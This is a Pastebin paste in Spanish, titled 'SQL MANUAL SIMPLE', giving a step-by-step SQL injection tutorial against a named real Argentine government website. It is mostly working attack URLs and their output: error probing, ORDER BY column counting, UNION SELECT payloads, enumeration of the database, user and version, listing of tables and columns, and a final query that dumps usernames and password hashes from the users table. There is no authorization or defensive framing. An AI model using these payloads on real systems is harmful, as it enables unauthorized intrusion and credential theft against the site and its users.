Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL MANUAL SIMPLE
- Ejemplo con una página vulnerable.
- 1-
- http://www.renatea.gob.ar/novedad.php?id=126'
- Aparecerá la siguiente alerta:
- Warning: mysql_numrows() expects parameter 1 to be resource, boolean given in /web/renatea/renatea.gob.ar/www/novedad.php on line 8
- Error al seleccionar la novedad con id 126'
- 2-
- http://www.renatea.gob.ar/novedad.php?id=126 order by 10--
- http://www.renatea.gob.ar/novedad.php?id=126 order by 9--
- http://www.renatea.gob.ar/novedad.php?id=126 order by 7--
- Bien hay siete tablas por donde podemos sacar la información
- 3-
- http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,3,4,5,6,7--
- Acá se nos presentarán las tablas en mi caso escogeré la 3
- 4-
- Ahora procedo a analizar la página para conocer ciertos datos:
- http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,concat(database(),user(),version()),4,5,6,7--
- renatea :: db
- root@localhost :: local host
- 5.5.24-0ubuntu0.12.04.1:: db version
- 5-
- Ahora procedemos a sacar el nombre de la columna:
- http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
- tablas: descargas,dump_delegaciones,exposiciones,prensa,slider,users
- Escogeré la tabla que me interesa y en este caso es la de users
- Pero antes de proseguir cambiaremos la palabra users a hexadecimal para ello iremos a la siguiente página:
- http://www.swingnote.com/tools/texttohex.php
- users= 7573657273
- 6-
- Continuamos ahora debemos sacar el nombre de la columna para ello hacemos lo siguiente:
- http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=0x7573657273--
- Al hacer esto nos muestra lo siguiente:
- id,name,password,admin,mail,empresa,direccion,telefono,logo,activo,id,name,password,admin,mail,empresa,direccion,telefono,logo,activo
- 7-
- De los datos expuestos anteriormente tomaré la columna name y la columna password ubicandolos de la manera siguiente:
- http://www.renatea.gob.ar/novedad.php?id=-126 UNION SELECT 1,2,group_concat(name,0x03,password,0x0a),4,5,6,7 from users--
- 0x03 Hace espacio entre el nombre y el password
- 0x0a hace linea por linea
- Al hacer esto nos mostrará los nombres y los hash de los passwords.
- Espero se haya comprendido.
- :D Saludos.
- By Netikerty Asenet
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement